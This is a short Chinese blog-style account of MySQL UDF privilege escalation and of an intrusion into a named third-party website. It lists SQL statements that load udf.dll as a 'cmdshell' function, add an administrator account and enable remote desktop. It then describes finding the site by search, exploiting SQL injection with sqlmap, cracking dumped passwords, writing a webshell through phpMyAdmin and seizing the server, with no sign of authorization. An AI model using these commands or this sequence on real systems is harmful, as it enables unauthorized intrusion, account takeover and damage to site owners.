udf提权的一次学习

udf提权。利用条件：root权限的mysql账号密码。提权方法：具体语句如下：

　　create function cmdshell returns string soname ‘udf.dll’;

　　select cmdshell(’net user iis_user 123 /add’);

　　select cmdshell(’net localgroup administrators iis_user /add’);

　　select cmdshell(’regedit /s d:\web\3389.reg’);

　　drop function cmdshell;

　　select cmdshell(’netstat -an’);

　　

要测试的站点：http://www.xiyutm.com/，至于怎么找到的呢？google大法好。


随便点进去一个url。。。都有注入点。。。


放到sqlmap里面跑


然后很幸运的跑到了后台的帐号和密码，还有数据库的帐号和密码，放到md5上面，解密需要money，，，放到习科里面，雷锋的菊苣们给了明文。。。。


然后呢？进入后台，找不到上传点。绝望了，，，然后和学长get了新技能，，，上了phpmyadmin，，，用数据库写一句话，，，很幸运，数据库的权限是root。。。


然后连接小马，，，开始udf提权。。。因为这个站点的条件很顺，，，所以直接上传了一个udf.php，，，连接数据库，net user呗，，，

然后服务器被搞定了。。。

看了一下，c盘只剩下几十kb了。。。。真牛。。。

后记：昨天晚上的时候，其实已经写完了，要比篇更加详细一些。但是当时写完的时候，正在和妹子聊qq，切换太快，尼玛，，，突然火狐浏览器一刷，，，没有了。。。加上这几天天气潮湿，感冒一直不好，，，就这样简单的记录一下吧。。。